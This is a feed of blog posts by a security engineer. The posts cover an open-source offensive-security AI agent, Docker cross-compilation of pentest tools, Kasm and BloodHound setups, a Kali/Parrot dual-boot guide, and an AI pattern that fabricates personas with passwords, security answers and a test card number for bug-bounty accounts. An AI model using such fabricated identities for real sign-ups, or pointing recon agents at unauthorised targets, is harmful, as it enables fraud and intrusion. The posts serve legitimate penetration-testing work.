Jekyll2026-03-20T19:48:36+00:00https://double16.github.io/feed.xmlPatrick Double | Secure Software EngineeringWith extensive experience in software engineering and cybersecurity, I specialize in designing, implementing, and securing software solutions across diverse industries. Explore my work and insights into the latest trends in cybersecurity, DevSecOps, and open-source solutions.Cyber-AutoAgent-ng2026-03-20T00:00:00+00:002026-03-20T00:00:00+00:00https://double16.github.io/l/2026/03/20/cyber-autoagentThe latest open source project I’ve been working on is a fork of the archived Cyber-AutoAgent. It is an offensive security agent with broad reasoning and goals at the top-level with plugable modules specifying more narrow targets. My fork is at https://github.com/double16/Cyber-AutoAgent-ng.

(Also keep an eye out for my shyhurricane project. It is my RAG solution to large web apps, but it needs a good agent, so I need the changes talked about here to be working first.)

My near-term goals for this project:

  • Operationalize it. Very good proof-of-concept work by the original author and contributors.
  • Target local small to mid-size models. Not everyone has 💸💸💸💸 and data privacy is a big concern.
  • Large scale recon analysis and reports on web apps, networks, source code, mobile, etc.
  • Check out the GitHub issues for milestones.

Anti-goals:

  • Full exploitation. I find a majority of cycles are spent on exploitation. Once the model tells me the vuln, I can fairly quickly exploit it myself.
  • “Autonomous pentester”. Computers are tools, tools are meant to free humans to do the creative work we excel at and enjoy.
  • Taking over the world. Boring. Owning the world is no good for an introvert, too much input.

Recently I was encouraged to write about my experiences as I go along. Seems like a good idea and looking back there are some conclusions I made that I wish I had a journal of the journey.

My primary machine is a MacBook Pro M1 with 32GB RAM. The results I’ll be writing about are from my laptop (Ollama) or free/cheap models on OpenRouter, NVIDIA NIM, etc. The caveat with the free/cheap models are that your data is likely being used for training or publishing. Some use cases are ok, such as evaluating intentionally vulnerable apps. The engineering to get smaller models to produce good results should result in larger models being more effective and efficient. (Maybe only 💸💸 instead of 💸💸💸💸.)

If you’re going to ask if I’ve seen how amazing the frontier models are, and why am I not in love with them, the answer is: yes, I am fully aware of the frontier models. Boring (sort of). Where is the challenge? Where is the bit twiddling optimizations that make a 14b model get results that matter? Also, where are you all getting all that money that’s making the big corps rich 😂 ??

A lot of the work has been tuning configuration and maintaining an efficient context. There are competing pressures with keeping the context small, yet having enough information for the model to reason.

You’ll see the current version is 0.7.0, which is primarily tool/shell calling improvements. The next milestone is 0.8.0 and it is big :p

The biggest changes are a task system and system prompt optimization. The task system is kept in long term memory and is key to allowing large scale operations. Context memory is not enough, even with frontier models. Along with the task system, system prompts need to change and be optimized.

Task System

The agent creates narrow tasks from tool results which will be used to drive further work. Memory tools serve the agent the next task so the agent doesn’t need the cognitive load of managing tasks.

CAA has had problems with coverage. My tests on JuiceShop and DVWA show a large increase in coverage.

In addition to task, the conversation budget code keeps certain messages because they represent state. If they are lost, the model loses its direction.

  • Objective
  • Last plan
  • Active task + evidence paths upon which the task was created

Models

My go-to local model has been qwen3-coder:30b with at least a 40K context window, 49K if my Mac unified memory allows. It does less reasoning, issuing tool calls sooner. However, the task system seems that it needs more reasoning.

Models I’ve found successful after this change:

  • qwen3:30b, qwen3:14b
  • gpt-oss:20b (it tends to stop issuing tool calls after 25-30 steps)

What does not work:

  • qwen3.5:9b, won’t make tool calls consistently, may be the model or small parameter size

Agent Stalling

A problem I’ve been dealing with for a while is the agent stalling, or failing to make progress by issuing tool calls.

For example, with gpt-oss:20b I get this:

**How does this move me toward OBJECTIVE or target coverage?**  
The logout page is part of the DVWA surface; confirming the absence of XSS here ensures coverage of the login/logout flow and validates that no reflected input is processed. This completes the XSS coverage for the logout endpoint.

**Next step:**  
Proceed to the next phase‑1 task: enumerate all endpoints, parameters, and authentication flows. This will provide the necessary coverage for subsequent hypothesis and exploitation phases.

Ok, great gpt-oss, why aren’t you issuing tool calls?

When detecting this case, I’m adding user messages like the following to the conversation:

  • Re-emit your last response as valid tool calls. No prose. No XML. At least one tool call is required to progress towards the objective. Reflect on next steps to reach the objective.
  • **MANDITORY ACTION**: Take your time to decide which tool to call for your next step. This tool MUST be called next to make progress.

Sometimes this works, other times the model refuses to issue tool calls.

The next idea I’m trying is to rebuild the context with the latest plan, memories and active task. That is working to make progress. I’ve added code to detect duplicate tasks, so we’ll see how it progresses.

I’m thinking of trying a sub-agent per task and loading the initial conversation with the plan, task and previews of the evidence relevant to the task. That could be a lot more work and I’m keen to release what I have so far.

System Prompt Optimization

The task system is intended to increase coverage. The system prompt was directed towards reducing steps, a direct conflict. I spent time re-writing prompts to balance coverage and efficiency, de-duplicating instructions, reducing confusion, etc.

The task management prompt seems too large, but the content there is needed to keep the agent rolling. If I try using sub-agents, I’ll also try moving task management into python code and have the agent create tasks. The result of the sub-agent would indicate the task is done or failed, taking that logic out of the context.

]]>
Docker Multiple Platform Builds: Go and Cargo2026-03-20T00:00:00+00:002026-03-20T00:00:00+00:00https://double16.github.io/l/2026/03/20/docker-go-cargo-cross-compileDocker lets you build for multiple platforms (i.e. amd64 and arm64) in the same build process and publish a multi-platform build. Generally this requires an emulator in the docker process, like qemu, which isn’t difficult to do. However, some things will not compile correctly and are better done with cross compiling. For example: Go and Rust.

Cross compiling works by configuring Docker for a build platform and target architecture. In the build commands, you give the compiler the target architecture.

For a full example, see my Kasm Workspace builds:

Go

FROM --platform=$BUILDPLATFORM golang:1.26 AS gobuild
ARG TARGETARCH
ARG BUILDPLATFORM
ENV DEBIAN_FRONTEND=noninteractive
ENV GOOS=linux GOARCH=$TARGETARCH
RUN apt-get update
ADD packages-go.sh /tmp
RUN --mount=type=cache,target=/usr/local/share/go-build-cache --mount=type=cache,target=/usr/local/share/go \
    /tmp/packages-go.sh

The --platform option to Docker tells it how to run the container, on your native architecture. The ARG TARGETARCH is how Docker tells you which architecture should be built. The values for each are a little different though:

--platform:

  • linux/amd64
  • linux/arm64

TARGETARCH:

  • amd64
  • arm64

The names make sense, one is a platform which includes the architecture, the other only the architecture. However, when writing your scripts is easy to get confused.

The build script gets messy if you want the build to work on either build platform. For example, if locally you use a Mac with Apple Silicon (arm64), but the build pipeline (GitHub) uses amd64.

If the package needs to compile C (or another language), you need to install the cross-compiler by name.

Go puts native executables in one place, cross-compiled executables elsewhere. It does makes sense if you’re building both in the same filesystem. Docker is using different containers for each, so you need logic to figure that out. The script that copies files from "${GOPATH}/bin/linux_${TARGETARCH}" handles this. I like to add a test to make sure the binary landed where I expected it.

export GOPATH=/usr/local/share/go
export TARGET_DIR=/usr/local/bin
mkdir -p "${TARGET_DIR}"
if [ "$BUILDPLATFORM" == "linux/$TARGETARCH" ]; then
  export GOBIN="${TARGET_DIR}"
fi
export GOCACHE=/usr/local/share/go-build-cache
export GOFLAGS="-ldflags=-s -w"
export CGO_ENABLED=1

# setup for module that need to compile C code
CC=gcc CXX=g++
C_PACKAGES="build-essential pkg-config git ca-certificates"
if [ "$(arch)" = "arm64" ] || [ "$(arch)" = "aarch64" ]; then
  C_PACKAGES="${C_PACKAGES} gcc-x86-64-linux-gnu g++-x86-64-linux-gnu libc6-dev-amd64-cross"
  if [ "$GOARCH" = "amd64" ]; then
    export CC=x86_64-linux-gnu-gcc CXX=x86_64-linux-gnu-g++
  fi
elif [ "$(arch)" = "amd64" ]; then
  C_PACKAGES="${C_PACKAGES} gcc-aarch64-linux-gnu g++-aarch64-linux-gnu libc6-dev-arm64-cross"
  if [ "$GOARCH" = "arm64" ]; then
    export CC=aarch64-linux-gnu-gcc CXX=aarch64-linux-gnu-g++
  fi
fi
apt-get install -y --no-install-recommends ${C_PACKAGES}

go install github.com/projectdiscovery/katana/cmd/katana@latest

if [ -d "${GOPATH}/bin/linux_${TARGETARCH}" ]; then
  find "${GOPATH}/bin/linux_${TARGETARCH}" -type f -print -exec cp {} "${TARGET_DIR}" \;
fi

test -x ${TARGET_DIR}/katana

Rust

Rust has similar complications. It was enough I created a Docker image that has an ONBUILD handler to deal with it. See https://github.com/double16/cargobuild.

FROM --platform=$BUILDPLATFORM ghcr.io/double16/cargobuild:latest AS cargobuild
ADD packages-cargo.sh /tmp
RUN --mount=type=cache,target=/usr/local/share/cargo \
    /tmp/packages-cargo.sh
# Get target specific vars, from the cargobuild image
if [[ -f "/etc/environment" ]]; then
  . /etc/environment
fi
# Setup the cargo environment, from the cargobuild image
if [[ -f "${HOME}/.cargo/env" ]]; then
  . "${HOME}/.cargo/env"
else
  export CARGO_HOME=/usr/local/share/cargo
fi
for CARGO in rustscan feroxbuster; do
  cargo install --root /usr/local ${TARGET:+--target ${TARGET}} "${CARGO}"
done

Moving Targets

As versions of Go and Rust are released, sometimes how cross compiling is handled breaks. I use my pentest-tools repo regularly. Check the files I referenced at the beginning for the latest working script-fu.

]]>
BloodHound Ephemeral Docker Container2026-03-06T00:00:00+00:002026-03-06T00:00:00+00:00https://double16.github.io/l/2026/03/06/bloodhound-kasm-imageIf you use BloodHound, I maintain an ephemeral docker image that runs with Kasm or standalone. (I enjoy Kasm for many reasons, check it out sometime.) It has a quicker start-up time because I let the database initialize at build time rather than runtime.

The ephemeral nature works great for CTFs or short engagements.

Disclaimer: This is meant for ephemeral, local use only.

https://gallery.ecr.aws/bramblethorn/kasm/bloodhound](https://gallery.ecr.aws/bramblethorn/kasm/bloodhound)

]]>
Wild West Hackin’ Fest 2026 - Denver2026-02-17T00:00:00+00:002026-02-17T00:00:00+00:00https://double16.github.io/l/2026/02/17/wwhf-denverI was accepted for my first conference talk at Wild West Hackin’ Fest in Denver, CO!

The topic was “Attacking AI Video Processing.” I’ll post a link to the video when it is available. Related to the topic is a blog post and GitHub repo:

WWHF was a great time! I like smaller conferences. (DefCon is too big for me.) The talks are practical and interesting. Everyone is friendly: BHIS staff, attendees, vendors.

I went to WWHF Deadwood in October 2024. It was my first security conference. As I’ve done in previous developer conferences, I tried to attend all the interesting talks. I left missing something… I didn’t know more people.

This time I decided to make an effort to skip some talks and talk to people. I’m glad I did! I had some great conversations. Even some popular people in the industry (IppSec, JHaddix and J. Haddix). Although there were great talks, the people were the best part.

My talk went well. Thanks go to my manager and colleagues for coaching! Some insightful questions afterwards, so people were interested :) When I have something useful to share, I will submit again.

Thanks BHIS! You are fostering a great community.

]]>
Kasm Workspaces Offensive Toolset2025-02-01T16:38:10+00:002025-02-01T16:38:10+00:00https://double16.github.io/l/2025/02/01/kasm-workspacesTL;DR: I am currently using Kasm Workspaces, which is a containerized solution, for my offensive security toolset. It solves a lot of problems for me. In my GitHub repo I have an Ansible playbook to install it to 99% of what I need. Others should be able to use it with little customization.

VMs are nice, but …

I really like virtualization and automation. IYKYK. I don’t want my host cluttered with tools and config I forgot about, or a major upgrade left cruft around. Then there’s the config change necessary for a CTF that breaks other stuff, but I find out it’s broken weeks later and I don’t know what I changed. There’s always the searching to tweak things to get it just right. Now, on another host, I have to go back through the search because I forgot what I did. A VM is mostly isolated, so code gone wrong has a smaller blast radius.

Virtualization brings some challenges too. Disk space usage can get high. For assessment isolation it’s best to take a snapshot of the “clean” install and then revert. I also take a snapshot before a major upgrade. So I’ve got a snapshot of the base install, followed by an upgrade, followed by an assessment. What if I want to work on a CTF? Stop the machine with the bug bounty work, start from a base snapshot for the CTF. How do I run both? Clone the VM, which is a lot of disk space and time. Linked clone? Ok, well, that’s another layer of effective snapshots. I typically get to the point where I cannot remove old snapshots because I don’t have the disk space. Delete it all, start over.

Containers are nicer

I’ve used a containerized development environment before. If I can get containers running, my environment is ready to go. Most clients will allow some form of docker: Docker for Desktop, podman, docker.io on Linux or WSL, etc. How about my security toolset?

Kasm

I stubbled across Kasm Workspaces recently. It is a Desktop-as-a-Service solution running on containers. It uses guac to access the desktop in a browser. It scales from a single install to a multiple server solution. This post describes what problems I want to solve and how I solved it. I use it as a single server install on my laptop with the intent of only accessing from my laptop. (It can be configured to allow connecting from other machines.)

Software is stored in a container image that includes a desktop component. Kasm provides many such “workspaces”. Some are based on Ubuntu, Kali or Parrot OS. A workspace can be extended by basing a new image on an existing one. Kasm has good documentation for this.

What am I solving for?

During my penetration testing journey, I’ve found the following things I want to solve:

  1. Automate tool installation and configuration
  2. Common resources such as wordlists, shells, etc.
  3. Isolation from the host
  4. Isolation between engagements: client, bug bounty, CTF
  5. Ability to run engagements concurrently
  6. Ephemeral: How painful is it to reinstall?
  7. Persistent storage of artifacts

Architecture

Simply put: I found I’m better off putting Kasm in a VM. It’s necessary on Mac or Windows. On Linux, Kasm can be installed on the host and it’s more efficient. Be careful what kind of host. If it’s a managed host, I recommend using a VM anyway. If virt-manager is an option it’s going to be very efficient anyway. EDR networking can mess with the container networking and it’s ugly.

Automate tool installation and configuration

I automate everything I can. If I do something twice, I ask myself why I didn’t automate it? The dev world is full of automation: CI/CD pipelines, infrastructure-as-code (Terraform, CDK, …), deployment. I don’t like repetitive tasks. I don’t like forgetting how I configured something and figuring that out again. I don’t want to write a playbook of instructions to repeat. Write a script or something.

I have automated the Kasm install and configure almost entirely. I’m using Ansible for the reasons one uses Ansible. The playbook is at https://github.com/double16/pentest-tools/tree/master/attackhost. Major things it does:

  1. Install docker
  2. Configure networking
  3. Mount directories shared from the host
  4. Clone git repos with fun tools into /opt
  5. Clone wordlists into /opt
  6. Install and configure Kasm
  7. Add workspace registeries to make it easy to install workspaces
  8. Configure installed workspaces with the persistent profile (if the S3 bucket is configured)

Networking: Kasm can run on multiple servers, so the different services need a way to talk to each other. It will use the laptop hostname, which will resolve to (usually) a DHCP assigned IP address. That IP address is stored and used in Kasm. When the laptop receives a new address, Kasm breaks. The networking tasks assign a local address and modify Kasm’s compose config to use it for the hostname.

Kasm has workspace registries to make it easy to find and install workspaces. The attackhost/vars/workspace_registries.yml file contains a list of registries. Mine is in there.

I have a Kasm Workspace Registry with workspaces tailored to my liking. Kali and ParrotOS extended with packages, Burp Suite Pro and CE from Portswigger, ZAP Weekly, Postman, Caido… Read the dockerfiles for a full list. Obsidian and JetBrains IDEA.

Bloodhound is a special one. I found the docker compose version of Bloodhound to be slow to install. The workspace has it installed to the point of changing the password. It’s ephemeral, so there isn’t cruft from previous uses.

Common resources such as wordlists, shells, etc.

Wordlists can be huge. Repos with tool source, like shells, can be huge. I avoid duplicating those in the Kali and Parrot images by putting them into /opt/wordlists and /opt/src. Kasm is configured to map them into all containers. These things can also be updated without requiring a new container image to be built.

Isolation from the host

It’s important to me to keep the host clean from tools and config. Using a VM does that by design. The host needs a virtualizer, such as VMware Workstation, VMware Fusion, VirtualBox, virt-manager, whatever. If a bare-metal install is used, containerization also isolates the host by design. It’s a little less isolated because Kasm adds a service account for the database and a few other minor things.

Isolation between engagements: client, bug bounty, CTF

It’s imperative for engagements to not mix artifacts between each other. Scan results, exploits. Secrets would be very bad. I treat CTFs like an engagement, it forms good habits. How does the workflow support isolation?

Create a Kasm user for each engagement. The configuration that mounts volume such as the wordlists applies to all users, so no configuration for the user is needed. The usefulness of this is further described.

Persistent profiles store the home directory of the container into an S3 bucket when the workspace is removed. When the workspace is created, the profile is restored. This helps keep configuration in place. There are options to disable this feature or reset the profile when creating the workspace.

The profile is specified using a templates that allows an image and/or user to be specified in the path. It looks like s3://my-bucket-name/profiles/{username}/{image_id}/. The profile is scoped per user per image. Per user equates to per engagement. Per image is needed because of different software in each container image that may conflict.

Ability to run engagements concurrently

Containerization is designed for multiple containers to run using the same image. Disk space is used efficiently. Upgrades to an image can happen while allowing existing containers to continue. Kasm will automatically remove older images that aren’t in use any longer.

Using the user-per-engagement approach, multiple logins can be used with private browser windows. Logging out of a user doesn’t stop the workspace, so switching users is also an option.

Ephemeral: How painful is it to reinstall?

VMs crash. Kasm will get out of sorts sometimes from the laptop sleeping or hard poweroff. Things happen.

How painful is it? See the install section below for the steps, but my experience is 20-30 minutes for reinstall, 30 more minutes to download the images depending on network bandwidth. Not bad. I don’t have to do it often. :)

Persistent storage of artifacts

Considering the Kasm install ephemeral begs the question, what about artifacts? My setup has two options.

The playbook will mount volumes shared from the host. Reinstalling Kasm won’t lose the host files and they will be available with the new install. Along with isolation, any shared directory that contains the word share will be configured to create a directory in the share with the user name. That user name directory is mounted. So the workspace container does not have access to the other user directories.

Kasm supports cloud storage providers. S3 is what I configure. It requires a bucket name, access key and secret. The others are more difficult when using OAuth because the laptop doesn’t have a good way to receive callbacks, etc.

The S3 integration using rclone to mount the bucket at /s3. It works fairly well. There are some filesystem consistency issues, but I haven’t lost data. See the rclone docs for details. The S3 volume doesn’t support specifying paths like the persistent profiles do. Using an S3 bucket doesn’t nicely isolate engagements like the host shares.

There is a /mnt/user_share directory that is mounted to the VM at /home/kasm_user_share. It has subdirectories for each Kasm user (engagement). Don’t use it for stuff that is important long term, or at least do a good job of keeping the VM healthy.

Install

I’m assuming the reader understands how to install a VM and configure the OS.

I recommend the VM have at least 120GB of disk space. 200GB is better. The disk usage is stable, it doesn’t grow much over time. Most of the space is the container images which are automatically cleaned by Kasm. Workspaces with lots of data stored outside of the volume mounts (shared folders, S3) will take up space but will be cleaned on removal.

I set memory to 2/3 of system memory, and cores to half of the total. YMMV.

For VMWare there is a script in the repo new-vm-vmware.sh that will create a new VM, auto-provision Ubuntu, and use btrfs with compression. Filesystem compression helps noticeably for the container images. The script will create a new SSH key, configure it in the VM, then configure a .hosts.ini file for use with Ansible.

The install requires some files ignored by git that are specific to the install. The playbook will create examples if they aren’t found, except for .hosts.ini.

file purpose
attackhost/.hosts.ini Ansible hosts config
vars/.networking-{hostname}.yml Settings for a local network to survive DHCP IP address changes
vars/.credentials.yml Credentials for Kasm, S3, etc. to remain stable across re-installs

The command for running the playbook follows.

$ cd pentest-tools/attackhost

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# ansible will stop requesting the configuration in `vars/.credentials.yml` to be updated

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# kasm is installed, login as [email protected] and install the desired workspaces

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# now the installed workspaces will have persistent profiles configured

.hosts.ini

hosts.ini has an example. Ignore [kasm_build] and [kasm_agents]. [kasm_build] is for the image build VM, which has specific requires for multi-platform builds. It’s not needed for use. [kasm_agents] is a work in progress that may not ever be.

The IP address is that of the VM used for ssh.

[kasm_server]
192.168.1.100 ansible_user=your_username ansible_ssh_private_key_file=~/.ssh/id_kasm

# 127.0.0.1 ansible_connection=local

vars/.networking-{hostname}.yml

This file is automatically generated. There shouldn’t be a need to modify it.

kasm_server_ip: "169.254.213.100"

vars/.credentials.yml

The generated values will contain values that the playbook populates. User [email protected] and admin_password are used for administration. The user_password is used for user logins. The other passwords and tokens are used internally.

storage_key, storage_secret and storage_bucket are the S3 config that is used for both persistent profiles and the S3 volume mount. If S3 isn’t desired, replace CHANGEME with empty strings.

kasm_users isn’t required, but can be used for users to provision by automation. The default user group is configured so that each user doesn’t require specific configuration.

admin_password: "generated"
user_password: "generated"
manager_token: "generated"
database_password: "generated"
redis_password: "generated"
registration_token: "generated"
storage_key: "CHANGEME"
storage_secret: "CHANGEME"
storage_bucket: "CHANGEME" 
kasm_users: "test,engagement1,engagement2,ctf1,ctf2"

User Experience

What is the workflow like?

The response is really good. IMHO it feels like typing on the host terminal.

Kasm has a control panel that can be expanded. “Workspaces” will minimize the workspace and allow others to be launcher. “Delete Session” will destroy it, saving the persistent profile.

The Kasm docs are very good. Read through them to understand other features.

Reinstalling

Ansible can be used to uninstall and reinstall Kasm if the VM is ok, but Kasm is broken in some way.

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm-uninstall.yaml
# kasm is uninstalled, containers may need to be forcibly removed in the VM

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# kasm is installed, login as [email protected] and install the desired workspaces

$ ansible-playbook --ask-become-pass -i .hosts.ini kasm.yaml
# now the installed workspaces will have persistent profiles configured

Warnings

Kasm is Desktop-as-a-Service

This means it is primarily intended to allow connections from other computers to run desktops. Only port 443 is needed. Bind it to the loopback device. Or block it with the firewall. Careful with EDR and running afoul of policies. Running in a VM with NAT networking and forwarding only port 443 on loopback will help.

Kasm touchs users and docker

Kasm adds a service account for the database. It installs some plugins into docker. There are some packages it needs. If these modifications will trigger the EDR, best to use a VM that may lessen the issue.

Lock-down Profile Storage

Persistent profiles will very likely have sensitive data such as secrets. Secure the S3 bucket, or don’t use persistent profiles.

An example bucket policy is in the repo at attackhost/kasm-s3-storage-policy.json.

]]>
Dual Booting Kali and Parrot2024-09-17T00:00:00+00:002024-09-17T00:00:00+00:00https://double16.github.io/l/2024/09/17/dual-boot-kali-parrotI recently acquired two monitors that included a laptop with it. I decided to use it as a disposable attack machine. Disposable in the sense that I can re-image it without data loss. Now, Kali or Parrot OS? I’ve been using HackTheBox pwnbox which is Parrot for a bit. How about both!

The GRUB boot loader has nicely supported multiple operating systems for some time. The Linux Volume Manager (LVM) allows flexible partitioning and resizing without using something like gparted. Key take aways are:

  1. Create a LVM volume for each OS
  2. Create a LVM volume for /home to share
  3. Create the same user on each OS to make the /home/ share work well

I’ll be able to boot into either OS, upgrade them independently, and keep my data in /home.

The post assumes you know something of installing Linux and what partitions and LVM are. If not, there is a lot of information on this already.

Create USB Media

I’m booting live DVDs from USB drives. Download the ISO of the desktop versions of Kali and Parrot. Write each to a USB drive using the following command. sudo dd is dangerous, make sure you get the devices correct or you could wipe out your hard drive.

$ sudo dd if=kali-or-parrot.iso of=/dev/usb bs=1M

The versions I used for this post:

Install Kali Linux

First, install Kali Linux. This is important . It has guided mode for partitioning with LVM using a separate /home volume. Parrot did not and I had trouble using the manual mode with LVM.

I choose “Graphical Install”.

Go through the install making the choices you’d like. When you get to the user name dialog, use the same user name on both Kali and Parrot. They are both Debian based, so the UID and GID will be 1000 on both operating systems. This will make the shared /home work seamlessly.

Partition with LVM

When you get to the following screen, pick either of the “set up LVM” options.

Choose the “Separate /home partition” option. Don’t try to share /var, and /tmp might be ok, but I didn’t test it. You won’t gain much.

This is very important, reduce the amount of disk space used for the Kali install. This controls the total amount of space used by the logical volumes, so there will be space for the Parrot OS install. LVM allows increasing space without re-partitioning later. The home volume will get the majority of the space automatically. Leave at least 60GB for Parrot if you can spare it.

Finish the Kali install with whatever options you like.

Install Parrot OS

Boot into the Parrot OS USB. If your machine’s UEFI BIOS doesn’t allow you to get into it with a keypress, choose the “UEFI Firmware Settings” selection from the Kali boot screen.

Select the “Try / Install” options.

Run “Install Parrot”.

Manual Partitioning

When you get to the “Partitions” section, choose “Manual partitioning”.

Edit the “/dev/kali-vg/home” volume to set the mount point to /home.

Create a new volume by selecting “Free Space” and “Create”. This is the free space left during the Kali install.

The default for Parrot 6.1 is “btrfs”, leave it. The LVM LV name should be recognizable to you as the Parrot root partition, i.e. “parrot”. The mount point must be “/”.

Change the storage device from the volume group to the device.

Edit the “FAT32” partition to be mounted at “/boot/efi”. This is where Parrot will put the kernel and boot info.

Make the username the same as the Kali install.

Finish the install.

Grub Changes

At the time of this writing, the Kali grub configuration does not find Parrot. This can be fixed by modifying /etc/grub.d/40_custom with the following content:

#!/bin/sh
exec tail -n +3 $0
# This file provides an easy way to add custom menu entries.  Simply type the
# menu entries you want to add after this comment.  Be careful not to change
# the 'exec tail' line above.

menuentry "Parror" {
    chainloader (hd0,gpt1)/EFI/Parrot/grubx64.efi
}

This will add an entry to the boot menu labeled Parrot. Choosing this will open the Parrot boot menu.

(hd0,gpt1) will need to match the EFI partition. hd0 is the reference to the hard drive in order that Linux finds it. gpt1 is the partition number. For example:

$ mount | grep /boot/efi
/dev/sda1 on /boot/efi type vfat (...)

For /dev/sda1 , the a shows this is the first magnetic disc. (SSD have a different scheme). The 1 is the partition number. Generally, when installing on bare metal, (hd0,gpt1) will be the values you want.

One final change I recommend when installing multiple operating systems is to disable the automatic boot. Otherwise, you’ll power up your machine, grab your coffee, and too late! You need to reboot now. :p

This change needs to be made on both Kali and Parrot because update-grub will be run when either has a kernel upgrade.

/etc/default/grub:

Apply the changes:

$ sudo update-grub
Generating grub configuration file ...
Found background image: /usr/share/images/desktop-base/desktop-grub.png
Found linux image: /boot/vmlinuz-6.5.0-13parrot1-amd64
Found initrd image: /boot/initrd.img-6.5.0-13parrot1-amd64
Warning: os-prober will be executed to detect other bootable partitions.
Its output will be used to detect bootable binaries on them and create new boot entries.
Found Kali GNU/Linux Rolling on /dev/mapper/kali--vg-root
Adding boot menu entry for UEFI Firmware Settings ...
done

Dual Boot

Rebooting shows entries for Parrot and Kali!

Snapshots

I recommend looking into LVM snapshots. This can save you in case of a bad OS update or you happen to run something malicious. There are a few packages: timeshift, snapper and autosnapshot. I’m going to give timeshift a try first because it has a GUI with snapshot restore. It will be interesting to see how installs on both Kali and Parrot operate.

]]>
Creating Personas using AI2024-09-12T00:00:00+00:002024-09-12T00:00:00+00:00https://double16.github.io/l/2024/09/12/fabric-patterns-create-personaWhen working bug bounties, you’re going to create users. Some of the profile information can take a minute to think up, at least for me. Now, I’ve created an AI bot to create personas for me and they are pretty good. I get a name, billing and shipping address, username, password, fake credit card, personal interests, bio, tag lines, a resume and more.

The code is available in my GitHub at https://github.com/double16/fabric, the create_persona pattern. The pattern is used with fabric, or you can paste the code into the OpenAI AI Assistant.

This pattern requires no input. It will create a persona in a randomly chosen large city. Any input given will influence the results, such as city, personal interests, and the domain name or URL of the target web site. The output is markdown so it will work with a variety of text editors.

St. Louis, MO

$ echo "St. Louis, MO" | fabric --pattern create_persona

Note that the avatar pictures have been redacted. It will pull pictures of real people and I don’t want to post those here.

Persona Details

  • Name: Sarah Thompson
  • Gender: Female
  • Date of Birth: August 15, 1985
  • Age: 38
  • Billing Address:
    • 4567 Pine Street
    • St. Louis, MO 63108
  • Shipping Address:
    • 4567 Pine Street
    • St. Louis, MO 63108
  • Phone Number: (314) 555-8392
  • Email: [email protected]
  • Password: Th0mP$0n!2023
  • Username: bluebird85
  • Payment Card:
    • Card Type: Visa
    • Card Number: 4111 1111 1111 1111
    • Expiration Date: 08/26
    • CCV: 456
  • Security Questions:
    • Question 1: What is the name of your first pet?
      • Answer: Max
    • Question 2: What is your mother’s maiden name?
      • Answer: Johnson
    • Question 3: What was the name of your elementary school?
      • Answer: Lincoln Elementary
  • City of Birth: Kansas City, MO
  • Cities Lived:
    • Kansas City, MO (1985-2003)
    • Columbia, MO (2003-2007)
    • St. Louis, MO (2007-Present)
  • Education History:
    • High School: Central High School, Kansas City, MO (Graduated 2003)
    • Bachelor’s Degree: University of Missouri, Columbia, MO (Bachelor of Science in Business Administration, Graduated 2007)
  • Job Title: Marketing Manager
  • Company: Gateway Marketing Solutions
  • Work Location: St. Louis, MO
  • Personal Interests:
    • Cooking
    • Hiking
    • Photography
    • Movies
  • Personal Bio:
    • Hey, I’m Sarah! Born and raised in Missouri, I’ve been living in St. Louis for the past 16 years. I work as a Marketing Manager and love to spend my weekends hiking and capturing the beauty of nature through photography. Big fan of cooking up new recipes and chilling with a good movie.
  • Tag Line:
    • Always chasing the next adventure and a great photo!
  • Avatar Pictures:
    • redacted

      Professional Resume

Sarah Thompson

Contact Information

  • Address: 4567 Pine Street, St. Louis, MO 63108
  • Phone: (314) 555-8392
  • Email: [email protected]

Summary

Experienced Marketing Manager with a demonstrated history of working in the marketing and advertising industry. Skilled in digital marketing, campaign management, and creative strategy. Passionate about hiking, photography, and culinary arts.

Education

  • University of Missouri, Columbia, MO
    • Bachelor of Science in Business Administration
    • Graduated: 2007

Professional Experience

  • Gateway Marketing Solutions, St. Louis, MO
    • Marketing Manager (2015 - Present)
      • Lead and manage a team of 10 marketing professionals.
      • Develop and execute marketing strategies to increase brand awareness and drive sales.
      • Analyze market trends and competitor activities to identify opportunities for growth.
      • Oversee digital marketing campaigns, including social media, email marketing, and SEO.
  • Creative Edge Marketing, St. Louis, MO
    • Marketing Specialist (2007 - 2015)
      • Assisted in the development and implementation of marketing campaigns.
      • Conducted market research and analysis to support strategic planning.
      • Collaborated with the design team to create promotional materials.

Skills

  • Digital Marketing
  • Campaign Management
  • Creative Strategy
  • Market Analysis
  • Team Leadership
  • Social Media Marketing
  • SEO

Personal Interests

  • Cooking
  • Hiking
  • Photography
  • Movies

References

Available upon request.

Seattle, WA - introvert

Let’s try creating an introverted persona :)

$ echo "Seattle, WA. Introvert." | fabric --pattern create_persona

Persona

  • First Name: Evelyn
  • Last Name: Thompson
  • Gender: Female
  • Date of Birth: May 14, 1987 (Age: 36)
  • Billing Address:
    • 3921 Pine Street
    • Seattle, WA 98101
  • Shipping Address:
    • 3921 Pine Street
    • Seattle, WA 98101
  • Phone Number: (206) 555-7392
  • Email: [email protected]
  • Password: E!v3lynT@2023#
  • Username: quiettechie87
  • Payment Card:
    • Type: Visa
    • Number: 4111 1111 1111 1111
    • Expiration Date: 11/25
    • CCV: 823
  • Security Questions:
    • What is your mother’s maiden name? Anderson
    • What was the name of your first pet? Whiskers
    • What was your first car? Honda Civic
  • City of Birth: Portland, OR
  • Cities Lived In:
    • Portland, OR (1987-2009)
    • Bellevue, WA (2009-2014)
    • Seattle, WA (2014-Present)
  • Education History:
    • B.S. in Computer Science, University of Oregon, 2005-2009
    • M.S. in Software Engineering, University of Washington, 2009-2011
  • Job Title: Senior Software Developer
  • Company: SeattleTech Innovations
  • Work Location: Seattle, WA
  • Personal Interests:
    • Reading mystery novels
    • Gardening
    • Coding and tech meetups
  • Personal Bio: Hey, I’m Evelyn! I love spending quiet evenings at home with a good book or tinkering with the latest tech gadgets. When I’m not coding, you can find me in my garden or at a local meetup. I may be an introvert, but I love learning and connecting with like-minded people.
  • Tag Line: “Coding by day, reading by night.”
  • Avatar Pictures:
    • redacted

Professional Resume

Evelyn Thompson

Contact Information

  • Address: 3921 Pine Street, Seattle, WA 98101
  • Phone: (206) 555-7392
  • Email: [email protected]

Objective

Experienced software developer with a strong background in computer science and software engineering. Seeking to leverage my skills in a senior development role at a forward-thinking tech company.

Education

  • M.S. in Software Engineering
    • University of Washington, 2009-2011
  • B.S. in Computer Science
    • University of Oregon, 2005-2009

Professional Experience

  • Senior Software Developer
